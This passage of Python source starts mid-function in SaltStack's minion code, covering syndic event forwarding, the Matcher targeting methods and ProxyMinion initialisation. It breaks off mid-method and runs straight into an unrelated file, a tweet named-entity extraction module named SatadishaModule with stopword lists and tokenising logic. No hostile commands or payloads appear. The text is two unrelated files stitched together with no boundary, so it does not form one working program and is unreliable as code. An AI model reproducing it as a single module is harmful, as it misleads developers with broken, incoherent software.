auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except KeyboardInterrupt:
raise
except: # pylint: disable=W0702
log.critical('Unexpected error while connecting to {0}'.format(opts['master']), exc_info=True)
raise tornado.gen.Return(syndic)
def _mark_master_dead(self, master):
'''
Mark a master as dead. This will start the sign-in routine
'''
# if its connected, mark it dead
if self._syndics[master].done():
syndic = self._syndics[master].result()
syndic.destroy()
self._syndics[master] = self._connect_syndic(syndic.opts)
else:
log.info('Attempting to mark {0} as dead, although it is already marked dead'.format(master)) # TODO: debug?
def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
'''
Wrapper to call a given func on a syndic, best effort to get the one you asked for
'''
if kwargs is None:
kwargs = {}
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error('Unable to call {0} on {1}, that syndic is not connected'.format(func, master_id))
continue
try:
getattr(syndic_future.result(), func)(*args, **kwargs)
return
except SaltClientError:
log.error('Unable to call {0} on {1}, trying another...'.format(func, master_id))
self._mark_master_dead(master)
continue
log.critical('Unable to call {0} on any masters!'.format(func))
def iter_master_options(self, master_id=None):
'''
Iterate (in order) over your options for master
'''
masters = list(self._syndics.keys())
shuffle(masters)
if master_id not in self._syndics:
master_id = masters.pop(0)
else:
masters.remove(master_id)
while True:
yield master_id, self._syndics[master_id]
if len(masters) == 0:
break
master_id = masters.pop(0)
def _reset_event_aggregation(self):
self.jids = {}
self.raw_events = []
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
self._spawn_syndics()
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
log.debug('MultiSyndic \'{0}\' trying to tune in'.format(self.opts['id']))
# register the event sub to the poller
self._reset_event_aggregation()
self.local_event_stream = zmq.eventloop.zmqstream.ZMQStream(self.local.event.sub, io_loop=self.io_loop)
self.local_event_stream.on_recv(self._process_event)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
io_loop=self.io_loop)
self.forward_events.start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
self.io_loop.start()
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
raw = raw[0]
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
event = {'data': data, 'tag': mtag}
log.trace('Got event {0}'.format(event['tag'])) # pylint: disable=no-member
tag_parts = event['tag'].split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in event['data']:
if 'jid' not in event['data']:
# Not a job return
return
if self.syndic_mode == 'cluster' and event['data'].get('master_id', 0) == self.opts.get('master_id', 1):
log.debug('Return received with matching master_id, not forwarding')
return
jdict = self.jids.setdefault(event['tag'], {})
if not jdict:
jdict['__fun__'] = event['data'].get('fun')
jdict['__jid__'] = event['data']['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if event['data']['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](event['data']['jid'])
)
self.jid_forward_cache.add(event['data']['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if 'master_id' in event['data']:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = event['data']['master_id']
jdict[event['data']['id']] = event['data']['return']
else:
# TODO: config to forward these? If so we'll have to keep track of who
# has seen them
# if we are the top level masters-- don't forward all the minion events
if self.syndic_mode == 'sync':
# Add generic event aggregation here
if 'retcode' not in event['data']:
self.raw_events.append(event)
def _forward_events(self):
log.trace('Forwarding events') # pylint: disable=no-member
if self.raw_events:
self._call_syndic('_fire_master',
kwargs={'events': self.raw_events,
'pretag': tagify(self.opts['id'], base='syndic'),
'timeout': self.SYNDIC_EVENT_TIMEOUT,
},
)
for jid, jid_ret in self.jids.items():
self._call_syndic('_return_pub',
args=(jid_ret, '_syndic_return'),
kwargs={'timeout': self.SYNDIC_EVENT_TIMEOUT},
master_id=jid_ret.get('__master_id__'),
)
self._reset_event_aggregation()
class Matcher(object):
'''
Use to return the value for matching calls from the master
'''
def __init__(self, opts, functions=None):
self.opts = opts
self.functions = functions
def confirm_top(self, match, data, nodegroups=None):
'''
Takes the data passed to a top file environment and determines if the
data matches this minion
'''
matcher = 'compound'
if not data:
log.error('Received bad data when setting the match from the top '
'file')
return False
for item in data:
if isinstance(item, dict):
if 'match' in item:
matcher = item['match']
if hasattr(self, matcher + '_match'):
funcname = '{0}_match'.format(matcher)
if matcher == 'nodegroup':
return getattr(self, funcname)(match, nodegroups)
return getattr(self, funcname)(match)
else:
log.error('Attempting to match with unknown matcher: {0}'.format(
matcher
))
return False
def glob_match(self, tgt):
'''
Returns true if the passed glob matches the id
'''
if not isinstance(tgt, six.string_types):
return False
return fnmatch.fnmatch(self.opts['id'], tgt)
def pcre_match(self, tgt):
'''
Returns true if the passed pcre regex matches
'''
return bool(re.match(tgt, self.opts['id']))
def list_match(self, tgt):
'''
Determines if this host is on the list
'''
if isinstance(tgt, six.string_types):
tgt = tgt.split(',')
return bool(self.opts['id'] in tgt)
def grain_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the grains glob match
'''
log.debug('grains target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['grains'], tgt, delimiter=delimiter
)
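# Example (illustrative): with grains {'os': 'Ubuntu', 'roles': ['web']},
#   grain_match('os:Ubu*')   -> True   (glob match on the grain value)
#   grain_match('os:CentOS') -> False
#   grain_match('Ubuntu')    -> False  (no delimiter, fails the early check)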
def grain_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Matches a grain based on regex
'''
log.debug('grains pcre target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains pcre match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['grains'], tgt,
delimiter=delimiter, regex_match=True)
def data_match(self, tgt):
'''
Match based on the local data store on the minion
'''
if self.functions is None:
utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=utils)
comps = tgt.split(':')
if len(comps) < 2:
return False
val = self.functions['data.getval'](comps[0])
if val is None:
# The value is not defined
return False
if isinstance(val, list):
# We are matching a single component to a single list member
for member in val:
if fnmatch.fnmatch(str(member).lower(), comps[1].lower()):
return True
return False
if isinstance(val, dict):
if comps[1] in val:
return True
return False
return bool(fnmatch.fnmatch(
val,
comps[1],
))
def pillar_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar glob match
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter
)
def pillar_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar pcre match
'''
log.debug('pillar PCRE target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar PCRE match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter, regex_match=True
)
def pillar_exact_match(self, tgt, delimiter=':'):
'''
Reads in the pillar match, no globbing, no PCRE
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['pillar'],
tgt,
delimiter=delimiter,
exact_match=True)
def ipcidr_match(self, tgt):
'''
Matches based on IP address or CIDR notation
'''
try:
tgt = ipaddress.ip_network(tgt)
# Target is a network
proto = 'ipv{0}'.format(tgt.version)
if proto not in self.opts['grains']:
return False
else:
return salt.utils.network.in_subnet(tgt, self.opts['grains'][proto])
except: # pylint: disable=bare-except
try:
# Target should be an address
proto = 'ipv{0}'.format(ipaddress.ip_address(tgt).version)
if proto not in self.opts['grains']:
return False
else:
return tgt in self.opts['grains'][proto]
except: # pylint: disable=bare-except
log.error('Invalid IP/CIDR target: {0}'.format(tgt))
return False
def range_match(self, tgt):
'''
Matches based on range cluster
'''
if HAS_RANGE:
range_ = seco.range.Range(self.opts['range_server'])
try:
return self.opts['grains']['fqdn'] in range_.expand(tgt)
except seco.range.RangeException as exc:
log.debug('Range exception in compound match: {0}'.format(exc))
return False
return False
def compound_match(self, tgt):
'''
Runs the compound target check
'''
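# Illustrative walk-through (hypothetical target): an expression such as
#   'G@os:Ubuntu and not L@minion1,minion2'
# is tokenized word by word; engine prefixes are resolved via the ref map defined
# below (G -> grain, L -> list, ...), each sub-match is stringified to 'True'/'False',
# and the assembled boolean string is finally evaluated with eval().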
if not isinstance(tgt, six.string_types) and not isinstance(tgt, (list, tuple)):
log.error('Compound target received that is neither string, list nor tuple')
return False
log.debug('compound_match: {0} ? {1}'.format(self.opts['id'], tgt))
ref = {'G': 'grain',
'P': 'grain_pcre',
'I': 'pillar',
'J': 'pillar_pcre',
'L': 'list',
'N': None, # Nodegroups should already be expanded
'S': 'ipcidr',
'E': 'pcre'}
if HAS_RANGE:
ref['R'] = 'range'
results = []
opers = ['and', 'or', 'not', '(', ')']
if isinstance(tgt, six.string_types):
words = tgt.split()
else:
words = tgt
for word in words:
target_info = salt.utils.minions.parse_target(word)
# Easy check first
if word in opers:
if results:
if results[-1] == '(' and word in ('and', 'or'):
log.error('Invalid beginning operator after "(": {0}'.format(word))
return False
if word == 'not':
if not results[-1] in ('and', 'or', '('):
results.append('and')
results.append(word)
else:
# seq start with binary oper, fail
if word not in ['(', 'not']:
log.error('Invalid beginning operator: {0}'.format(word))
return False
results.append(word)
elif target_info and target_info['engine']:
if 'N' == target_info['engine']:
# Nodegroups should already be expanded/resolved to other engines
log.error('Detected nodegroup expansion failure of "{0}"'.format(word))
return False
engine = ref.get(target_info['engine'])
if not engine:
# If an unknown engine is called at any time, fail out
log.error('Unrecognized target engine "{0}" for'
' target expression "{1}"'.format(
target_info['engine'],
word,
)
)
return False
engine_args = [target_info['pattern']]
engine_kwargs = {}
if target_info['delimiter']:
engine_kwargs['delimiter'] = target_info['delimiter']
results.append(
str(getattr(self, '{0}_match'.format(engine))(*engine_args, **engine_kwargs))
)
else:
# The match is not explicitly defined, evaluate it as a glob
results.append(str(self.glob_match(word)))
results = ' '.join(results)
log.debug('compound_match {0} ? "{1}" => "{2}"'.format(self.opts['id'], tgt, results))
try:
return eval(results) # pylint: disable=W0123
except Exception:
log.error('Invalid compound target: {0} for results: {1}'.format(tgt, results))
return False
return False
def nodegroup_match(self, tgt, nodegroups):
'''
This is a compatibility matcher and is NOT called when using
nodegroups for remote execution, but is called when the nodegroups
matcher is used in states
'''
if tgt in nodegroups:
return self.compound_match(
salt.utils.minions.nodegroup_comp(tgt, nodegroups)
)
return False
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
the host it runs on, but instead manipulates a device that cannot run a minion.
'''
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
'''
log.debug("subclassed _post_master_init")
self.opts['master'] = master
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
if 'proxy' not in self.opts['pillar']:
log.error('No proxy key found in pillar for id '+self.opts['id']+'.')
log.error('Check your pillar configuration and contents. Salt-proxy aborted.')
self._running = False
raise SaltSystemExit(code=-1)
fq_proxyname = self.opts['pillar']['proxy']['proxytype']
self.opts['proxy'] = self.opts['pillar']['proxy']
# We need to do this again, because we are going to throw out a lot of grains.
self.opts['grains'] = salt.loader.grains(self.opts)
# Need to load the modules so they get all the dunder variables
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
# we can then sync any proxymodules down from the master
self.functions['saltutil.sync_proxymodules'](saltenv='base')
# Then load the proxy module
self.proxy = salt.loader.proxy(self.opts)
# And re-load the modules so the __proxy__ variable gets injected
self.functions, self.returners, self.function_errors, self.executors = self._load_modules(proxy=self.proxy)
self.functions.pack['__proxy__'] = self.proxy
self.proxy.pack['__salt__'] = self.functions
self.proxy.pack['__ret__'] = self.returners
if ('{0}.init'.format(fq_proxyname) not in self.proxy
or '{0}.shutdown'.format(fq_proxyname) not in self.proxy):
log.error('Proxymodule {0} is missing an init() or a shutdown() or both.'.format(fq_proxyname))
log.error('Check your proxymodule. Salt-proxy aborted.')
self._running = False
raise SaltSystemExit(code=-1)
proxy_init_fn = self.proxy[fq_proxyname+'.init']
proxy_init_fn(self.opts)
self.opts['grains'] = salt.loader.grains(self.opts)
# Check config 'add_proxymodule_to_opts' Remove this in Boron.
if self.opts['add_proxymodule_to_opts']:
self.opts['proxymodule'] = self.proxy
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
# add default scheduling jobs to the minions scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if self.opts['master_alive_interval'] > 0:
self.schedule.add_job({
'__master_alive':
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
self.grains_cache = self.opts['grains']
# SatadishaModule_final_trie.py
# coding: utf-8
# In[298]:
import sys
import re
import string
import csv
import random
import time
#import binascii
#import shlex
import numpy as np
import pandas as pd
from itertools import groupby
from operator import itemgetter
from collections import OrderedDict
from collections.abc import Iterable
from nltk.tokenize import sent_tokenize, word_tokenize
from nltk.corpus import stopwords
from scipy import stats
#from datasketch import MinHash, MinHashLSH
import NE_candidate_module as ne
import Mention
import threading, queue
import datetime
import copy
import trie as trie
# In[324]:
#---------------------Existing Lists--------------------
cachedStopWords = stopwords.words("english")
tempList=["i","and","or","other","another","across","were","you","then","still","is","while","till","nor","perhaps","otherwise","until","sometimes","sometime","seem","cannot","seems","because","can","like","into","able","unable","either","neither","if","we","it","else","elsewhere","how","not","what","who","when","where","where's","where’s","where'd","where’d","where'll","where’ll","who's","who’s","he's","he’s","he’d","he'd","she's","she’s","she’d","she'd","let","today","tomorrow","tonight","let's","let’s","lets","know","make","oh","via","i","yet","must","mustnt","mustn't","mustn’t","i'll","i’ll","you'll","you’ll","we'll","we’ll","done","doesnt","doesn't","doesn’t","dont","don't","don’t","did","didnt","didn't","didn’t","much","without","could","couldn't","couldn’t","would","wouldn't","wouldn’t","should","shouldn't","shouldn’t","shall","isn't","isn’t","hasn't","hasn’t","was","wasn't","wasn’t","also","let's","let’s","let","well","just","everyone","anyone","noone","none","someone","theres","there's","there’s","everybody","nobody","somebody","anything","else","elsewhere","something","nothing","everything","i'd","i’d","i’m","won't","won’t","i’ve","i've","they're","they’re","we’re","we're","we'll","we’ll","we’ve","we've","they’ve","they've","they’d","they'd","they’ll","they'll","again","you're","you’re","you've","you’ve","thats","that's",'that’s','here’s',"here's","what's","what’s","i’m","i'm","a","so","except","arn't","aren't","arent","this","when","it","it’s","it's","he's","she's","she'd","he'd","he'll","she'll","she’ll","many","can't","cant","can’t","werent","weren't","were’t","even","yes","no","these","here","there","to","maybe","<hashtag>","<hashtag>.","ever","every","never","there's","there’s","whenever","wherever","however","whatever","always"]
prep_list=["in","at","of","on","with","by","&;"] #includes common conjunction as well
article_list=["a","an","the"]
day_list=["sunday","monday","tuesday","wednesday","thursday","friday","saturday","mon","tues","wed","thurs","fri","sat","sun"]
month_list=["january","february","march","april","may","june","july","august","september","october","november","december","jan","feb","mar","apr","may","jun","jul","aug","sep","oct","nov","dec"]
for item in tempList:
if item not in cachedStopWords:
cachedStopWords.append(item)
cachedStopWords.remove("don")
#cachedStopWords.remove("may")
cachedTitles = ["mr.","mr","mrs.","mrs","miss","ms","sen.","dr","dr.","prof.","president","congressman"]
chat_word_list=["please","4get","ooh","idk","oops","yup","stfu","uhh","2b","dear","yay","btw","ahhh","b4","ugh","ty","cuz","coz","sorry","yea","asap","ur","bs","rt","lfmao","slfmao","u","r","nah","umm","ummm","thank","thanks","congrats","whoa","rofl","ha","ok","okay","hey","hi","huh","ya","yep","yeah","fyi","duh","damn","lol","omg","congratulations","fuck","wtf","wth","aka","wtaf","xoxo","rofl","imo","wow","fck","haha","hehe","hoho"]
#string.punctuation.extend('“','’','”')
#---------------------Existing Lists--------------------
# In[300]:
class SatadishaModule():
def __init__(self):
print("hello")
#self.batch=batch
#self.batch=self.batch[:3000:]
self.counter=0
#self.extract()
def flatten(self,mylist, outlist,ignore_types=(str, bytes, int, ne.NE_candidate)):
if mylist !=[]:
for item in mylist:
#print not isinstance(item, ne.NE_candidate)
if isinstance(item, list) and not isinstance(item, ignore_types):
self.flatten(item, outlist)
else:
if isinstance(item,ne.NE_candidate):
item.phraseText=item.phraseText.strip(' \t\n\r')
item.reset_length()
else:
if type(item)!= int:
item=item.strip(' \t\n\r')
outlist.append(item)
return outlist
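# Sketch of the intended behaviour (hypothetical input): nested token lists are
# flattened depth-first while plain strings are stripped of surrounding whitespace, e.g.
#   flatten([['New', ['York ']], 'City'], []) -> ['New', 'York', 'City']
# NE_candidate items are kept as objects, with their phraseText stripped in place.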
def normalize(self,word):
strip_op=word
strip_op=(((strip_op.lstrip(string.punctuation)).rstrip(string.punctuation)).strip()).lower()
strip_op=(strip_op.lstrip('“‘’”')).rstrip('“‘’”')
#strip_op= self.rreplace(self.rreplace(self.rreplace(strip_op,"'s","",1),"’s","",1),"’s","",1)
if strip_op.endswith("'s"):
li = strip_op.rsplit("'s", 1)
return ''.join(li)
elif strip_op.endswith("’s"):
li = strip_op.rsplit("’s", 1)
return ''.join(li)
else:
return strip_op
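# Example of the normalization applied to candidate strings (illustrative):
#   normalize('“Obama’s”') -> 'obama'
#   normalize('(Trump),')  -> 'trump'
# i.e. surrounding ASCII punctuation and curly quotes are stripped, the text is
# lower-cased, and a trailing possessive 's is removed.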
#@profile
def extract(self,batch,batch_number):
#df = read_csv('eric_trump.csv', index_col='ID', header=0, encoding='utf-8')
print("Phase I extracting now")
time_in=time.time()
self.batch=batch
#output.csv
#df_out= DataFrame(columns=('tweetID', 'sentID', 'hashtags', 'user', 'usertype', 'TweetSentence', 'phase1Candidates'))
self.df_out= pd.DataFrame(columns=('tweetID', 'sentID', 'hashtags', 'user', 'TweetSentence', 'phase1Candidates','start_time','entry_batch','annotation'))
if(self.counter==0):
#self.df_out= pd.DataFrame(columns=('tweetID', 'sentID', 'hashtags', 'user', 'TweetSentence', 'phase1Candidates','correct_candidates_tweet'))
#dict1 = {'tweetID':0, 'sentID':0, 'hashtags':'first', 'user':'user', 'TweetSentence':'sentence', 'phase1Candidates':'phase1Out','start_time':'now','entry_batch':'batch_number'}
self.CTrie=trie.Trie("ROOT")
self.ME_EXTR=Mention.Mention_Extraction()
self.phase2stopWordList=[]
#self.df_out= pd.DataFrame({'tweetID':0, 'sentID':0, 'hashtags':'first', 'user':'user', 'TweetSentence':'sentence', 'phase1Candidates':'phase1Out','start_time':'now','entry_batch':'batch_number'}, index=[0,])
#%%timeit -o
#module_capital_punct.main:
'''Previously this ran for 100 iterations for testing purposes; that outer loop is no
longer needed when processing one tuple (batch row) at a time.'''
#if(self.counter==0):
#initializing candidateBase with a dummy node
#self.interCWSGap={}
#candidateBase={}
#NE_container=DataFrame(columns=('candidate', 'frequency', 'capitalized', 'start_of_sentence', 'abbreviation', 'all_capitalized','is_csl','title','has_number','date_indicator','is_apostrophed','has_intermediate_punctuation','ends_like_verb','ends_like_adverb','change_in_capitalization','has_topic_indicator'))
count=0
ne_count=0
userMention_count=0
#token_count=0
NE_list_phase1=[]
UserMention_list=[]
df_holder=[]
#--------------------------------------PHASE I---------------------------------------------------
for index, row in self.batch.iterrows():
now = datetime.datetime.now()
#now=str(now.hour)+":"+str(now.minute)+":"+str(now.second)
#hashtags=str(row['Discussion'])
hashtags=str(row['HashTags'])
user=str(row['User'])
#userType=str(row['User Type'])
tweetText=str(row['TweetText'])
#correct_candidates_tweet=str(row['Mentions'])
#print(str(index))
annot_raw=str(row['mentions_other'])
split_list=annot_raw.split(";")
#split_listFilter=list(filter(lambda element: element.strip()!='', split_list))
split_listFilter=list(filter(None, split_list))
#annotations in list of list structure
filtered_2_times=list(map(lambda element: list(filter(None, element.split(','))), split_list))
#capitalization module
#if all words are capitalized:
# print(index)
# if tweetText.isupper():
# print(index,tweetText)
# dict1 = {'tweetID':str(index), 'sentID':str(0), 'hashtags':hashtags, 'user':user, 'TweetSentence':tweetText, 'phase1Candidates':"nan",'start_time':now,'entry_batch':batch_number,'annotation':filtered_2_times[0]}
# df_holder.append(dict1)
# elif tweetText.islower():
# print(index,tweetText)
# print("",end="")
# dict1 = {'tweetID':str(index), 'sentID':str(0), 'hashtags':hashtags, 'user':user, 'TweetSentence':tweetText, 'phase1Candidates':"nan",'start_time':now,'entry_batch':batch_number,'annotation':filtered_2_times[0]}
# df_holder.append(dict1)
#else:
ne_List_final=[]
userMention_List_final=[]
#pre-modification: returns word list split at whitespaces; retains punctuation
tweetSentences=list(filter (lambda sentence: len(sentence)>1, tweetText.split('\n')))
tweetSentenceList_inter=self.flatten(list(map(lambda sentText: sent_tokenize(sentText.lstrip().rstrip()),tweetSentences)),[])
tweetSentenceList=list(filter (lambda sentence: len(sentence)>1, tweetSentenceList_inter))
#filtering nan values
if(len(filtered_2_times[0])==1):
if(filtered_2_times[0][0]=='nan'):
filtered_2_times[0]=[]
# print(index,filtered_2_times,tweetSentenceList)
for sen_index in range(len(tweetSentenceList)):
sentence=tweetSentenceList[sen_index]
# uncomment this
modified_annotations=[self.normalize(candidate)for candidate in filtered_2_times[sen_index]]
annotation=[]
for candidate in modified_annotations:
if(candidate=="nan"):
pass
else:
annotation.append(candidate)
# for i in filtered_2_times[sen_index]:
# if(i=="nan"):
#print(sentence)
#print(sen_index)
#tweetWordList= list(filter(lambda word:(word.strip(string.punctuation))!="",sentence.split()))
phase1Out=""
if((not tweetText.isupper()) &(not tweetText.islower())):
tempList=[]
tempWordList=sentence.split()
#print(tempWordList)
for word in tempWordList:
temp=[]
# if(temp1):
# temp=list(map(lambda elem: elem+'..', temp1[:-1]))
# temp.append(temp1[-1])
if (("?" in word)&(not word.endswith("?"))):
temp1=list(filter(lambda elem: elem!='',word.split("?")))
if(temp1):
temp=list(map(lambda elem: elem+'?', temp1[:-1]))
temp.append(temp1[-1])
elif ((":" in word)&(not word.endswith(":"))):
temp1=list(filter(lambda elem: elem!='',word.split(":")))
if(temp1):
temp=list(map(lambda elem: elem+':', temp1[:-1]))
temp.append(temp1[-1])
elif (("," in word)&(not word.endswith(","))):
#temp=list(filter(lambda elem: elem!='',word.split(",")))
temp1=list(filter(lambda elem: elem!='',word.split(",")))
if(temp1):
temp=list(map(lambda elem: elem+',', temp1[:-1]))
temp.append(temp1[-1])
elif (("/" in word)&(not word.endswith("/"))):
temp1=list(filter(lambda elem: elem!='',word.split("/")))
if(temp1):
temp=list(map(lambda elem: elem+'/', temp1[:-1]))
temp.append(temp1[-1])
elif "..." in word:
#print("here")
temp=list(filter(lambda elem: elem!='',word.split("...")))
# if(temp1):
# temp=list(map(lambda elem: elem+'...', temp1[:-1]))
# temp.append(temp1[-1])
elif ".." in word:
temp=list(filter(lambda elem: elem!='',word.split("..")))
#print(index, temp)
else:
#if word not in string.punctuation:
temp=[word]
if(temp):
tempList.append(temp)
tweetWordList=self.flatten(tempList,[])
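# Illustrative effect of the splitting above (hypothetical tokens): words holding an
# internal ',', ':', '?', '/' or an ellipsis are split so each fragment keeps its
# trailing separator, e.g. 'Trump,Obama' -> ['Trump,', 'Obama'] while
# 'so...anyway' -> ['so', 'anyway'].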
#print(tweetWordList)
#token_count+=len(tweetWordList)
#returns position of words that are capitalized
#print(tweetWordList)
tweetWordList_cappos = list(map(lambda element : element[0], filter(lambda element : self.capCheck(element[1]), enumerate(tweetWordList))))
#print(tweetWordList_cappos)
#returns list of stopwords in tweet sentence
combined_list_here=([]+cachedStopWords+article_list+prep_list+chat_word_list)
#combined_list_here.remove("the")
tweetWordList_stopWords=list(filter(lambda word: ((word[0].islower()) & (((word.strip()).strip(string.punctuation)).lower() in combined_list_here))|(word.strip() in string.punctuation)|(word.startswith('@')), tweetWordList))
#returns list of @userMentions
userMentionswPunct=list(filter(lambda phrase: phrase.startswith('@'), tweetWordList))
userMentions=list(map(lambda mention: mention.rstrip(string.punctuation), userMentionswPunct))
userMention_count+=len(userMentions)
userMention_List_final+=userMentions
'''#function to process and store @ user mentions---- thread 1
#print(userMention_List_final)
threading.Thread(target=self.ME_EXTR.ComputeAll, args=(userMention_List_final,)).start()'''
#non @usermentions are processed in this function to find non @, non hashtag Entities---- thread 2
ne_List_allCheck=[]
#if(len(tweetWordList)>len(tweetWordList_cappos)):
#print(len(tweetWordList),str(len(tweetWordList_cappos)),str(len(tweetWordList_stopWords)))
if((len(tweetWordList))>(len(tweetWordList_cappos))):
#q = queue.Queue()
#threading.Thread(target=self.trueEntity_process, args=(tweetWordList_cappos,tweetWordList,q)).start()
ne_List_allCheck= self.trueEntity_process(tweetWordList_cappos,tweetWordList)
#ne_List_allCheck= q.get()
ne_count+=len(ne_List_allCheck)
ne_List_final+=ne_List_allCheck
#write row to output dataframe
if(len(tweetWordList)==len(tweetWordList_cappos)):
phase1Out="nan"
if(len(ne_List_allCheck)>0):
for candidate in ne_List_allCheck:
position = '*'+'*'.join(str(v) for v in candidate.position)
position=position+'*'
candidate.set_sen_index(sen_index)
phase1Out+=(((candidate.phraseText).lstrip(string.punctuation)).strip())+ '::'+str(position)+"||"
else:
phase1Out="nan"
#print(self.df_out.columns)
dict1 = {'tweetID':str(index), 'sentID':str(sen_index), 'hashtags':hashtags, 'user':user, 'TweetSentence':sentence, 'phase1Candidates':phase1Out,'start_time':now,'entry_batch':batch_number,'annotation':annotation}
df_holder.append(dict1)
#self.df_out.append(outrow)
#self.df_out=self.df_out.append(outrow,ignore_index=True)
for candidate in ne_List_final:
#self.insert_dict (candidate,self.NE_container,candidateBase,index,candidate.sen_index,batch_number)
candidateText=(((candidate.phraseText.lstrip(string.punctuation)).rstrip(string.punctuation)).strip(' \t\n\r')).lower()
candidateText=(candidateText.lstrip('“‘’”')).rstrip('“‘’”')
candidateText= self.rreplace(self.rreplace(self.rreplace(candidateText,"'s","",1),"’s","",1),"’s","",1)
combined=[]+cachedStopWords+cachedTitles+prep_list+chat_word_list+article_list+day_list
if not ((candidateText in combined)|(candidateText.isdigit())|(self.is_float(candidateText))):
self.CTrie.__setitem__(candidateText.split(),len(candidateText.split()),candidate.features,batch_number)
if(index==191):
print(sentence)
self.printList(ne_List_final)
#if(userMention_List_final):
# print(userMention_List_final)
NE_list_phase1+=ne_List_final
UserMention_list+=userMention_List_final
#print ("\n")
#fieldnames=['candidate','freq','length','cap','start_of_sen','abbrv','all_cap','is_csl','title','has_no','date','is_apostrp','has_inter_punct','ends_verb','ends_adverb','change_in_cap','topic_ind','entry_time','entry_batch','@mention']
#updated_NE_container=[]
'''#Updating trie with @mention info
self.CTrie.updateTrie("",self.ME_EXTR)'''
time_out=time.time()
#for display purposes Iterating through the trie
'''candidateBase= self.CTrie.__iter__()
for node in candidateBase:
print(node)'''
'''for key in self.NE_container.keys():
val=self.NE_container[key]+[str(ME_EXTR.checkInDictionary(key))]
#index+=1
#updated_NE_container[key]=val
dict1 = {'candidate':key, 'freq':val[0],'length':val[1],'cap':val[2],'start_of_sen':val[3],'abbrv':val[4],'all_cap':val[5],'is_csl':val[6],'title':val[7],'has_no':val[8],'date':val[9],'is_apostrp':val[10],'has_inter_punct':val[11],'ends_verb':val[12],'ends_adverb':val[13],'change_in_cap':val[14],'topic_ind':val[15],'entry_time':val[16],'entry_batch':val[17],'@mention':val[18]}
updated_NE_container.append(dict1)'''
'''with open('candidate_base.csv', 'w') as output_candidate:
#with open('candidates.csv', 'w') as output_candidate:
writer = csv.writer(output_candidate)
writer.writerow(fieldnames)
for k, v in updated_NE_container.items():
writer.writerow([k] + v)'''
#print("Total number of tokens processed: "+str(token_count))
#print ("Total number of candidate NEs extracted: "+str(len(candidateBase)))
#print(self.NE_container.items())
#freqs=pd.read_csv('candidate_base.csv', encoding = 'utf-8',delimiter=',')
#freqs = pd.DataFrame(updated_NE_container, columns=fieldnames)
#freqs = pd.DataFrame()
#freqs=pd.DataFrame(list(self.NE_container.items()), orient='index')#columns=fieldnames)
self.append_rows(df_holder)
self.counter=self.counter+1
#return (copy.deepcopy(self.df_out),copy.deepcopy(freqs),time_in,time_out)
return (self.df_out,self.CTrie,time_in,time_out,self.phase2stopWordList)
#return sorted_candidateBase
#@profile
def append_rows(self,df_holder):
df = pd.DataFrame(df_holder)
self.df_out=self.df_out.append(df)
